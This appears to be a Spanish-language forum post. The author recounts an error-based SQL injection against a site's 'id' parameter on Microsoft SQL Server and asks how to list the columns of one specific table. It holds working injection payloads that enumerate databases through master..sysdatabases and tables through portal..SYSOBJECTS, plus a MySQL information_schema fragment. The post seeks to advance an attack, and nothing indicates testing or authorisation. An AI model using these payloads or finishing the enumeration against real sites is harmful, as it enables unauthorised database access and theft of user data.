Bueno mi duda es la siguiente .. estuve realizando una inyeccion y pude sacar datos basicos ( como version,usuario,base de datos),ademàs de eso tambien saque todos los nombres de las bases de datos y de luego pude sacar todas las tablas de una sola base de datos en la cual tenia permisos el usuario.

hice lo siguiente:

asi para sacar las bases de datos:

?id=45 or 1 in (SELECT TOP 1 name FROM (SELECT TOP 1 name FROM (SELECT TOP 3 name FROM master..sysdatabases ORDER BY name ASC) as foo ORDER by name DESC) as foo ORDER by name DESC)--
y cambiando el TOP mostraba las demàs

y asi las tablas:

?id=45 or 1 in (SELECT TOP 1 name FROM (SELECT TOP 1 name FROM (SELECT TOP 123 name FROM portal..SYSOBJECTS ORDER BY name ASC) as foo ORDER by name DESC) as foo ORDER by name DESC)--

la pregunta es .. como puedo sacar las columnas de una tabla?

me refiero a no tener que sacar todas las columnas de todas las tablas si no de una en especial .. algo parecido a esto como en mysql:

from+information_schema.columns+WHERE+table_name = 'usuarios'--

como vemos en MySQL busca las columnas pero solo de esa tabla en especial.